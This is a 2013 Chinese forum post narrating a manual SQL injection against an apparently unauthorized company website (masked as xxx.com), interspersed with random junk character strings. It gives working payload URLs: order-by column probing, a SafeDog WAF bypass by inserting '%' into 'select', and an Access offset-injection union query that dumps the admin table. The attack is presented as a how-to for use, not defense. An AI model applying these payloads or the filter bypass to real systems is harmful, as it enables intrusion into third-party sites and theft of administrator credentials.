找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1895|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
! J- L$ O, y& i2 x) ~4 L. a" T1 Y6 z8 R& e& v  ~
4 o( E* Q: ~& k
顺手加个admin
1 ~/ Y# K& ]5 P. L# `; L' R! W3 y+ z* x7 h

7 a# Y- q; |/ i+ N  s默认后台。
4 |$ u8 P$ j, A7 E; q. g& S回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
2 P: ^7 l2 s% k+ p+ T* \1 ^0 z3 n/ L( e
4 C0 N! [$ i! o2 _4 Y* W4 z% D

& C* B. y- J$ J5 N( I5 ^所以就不用御剑扫了,待会直接封IP。3 {; Q8 U' l& R5 H

# w1 a9 d& G  {4 u用order by语句判断是否存在注入。, x$ P  d9 U: |  z, |- R) G
http://www.xxx.com /product_show.asp?id=997 order by 1' G4 d9 _+ A3 h0 d
http://www.xxx.com /product_show.asp?id=997 order by 1003 d1 s7 Z' C- Q7 L5 h
现在存在注入,经测试后发现是9个字段。
7 K' R3 e( A5 X6 ~; V. z * k' q* i# f4 Y  ]) @
接下来进行联合查询,猜是否存在admin表。
  o* I& m) g. ]http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
) L* W: u' Q0 z6 X4 |" U6 O
0 T: u6 u* n& R* ]8 w
% T7 q7 R! x0 d3 _9 ?2 @
+ H, F0 J9 B1 P) f$ a% R9 ^. O8 L在select中间加个%,se%lect绕过安全狗。
$ I( Y# T# B* o4 `/ h2 Y# s, n* A' }+ \$ r/ R2 _, c  F

" j# c" D+ U3 a: a# L发现存在admin表,然后开始手工猜常用的字段。
$ E9 A% G' `8 D# u9 n; s纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。1 U, t" Q8 p% m" J
  @% w! F$ e! B% t7 n
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" R0 J  ?; @/ D; ~) b7 `
, b# J, b, g# {4 n+ y
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。/ \) G) d, j6 J( R
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
, V8 P! d2 ^8 l2 J0 ]. U好了,敏感内容出显了。​
) F3 c! ^# x7 x8 f) R1 U; z7 s+ O6 q, S5 h

/ Z0 ~( e# c- E  N
5 v9 h0 r2 Q/ ~/ m5 z) o. W0 `  l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表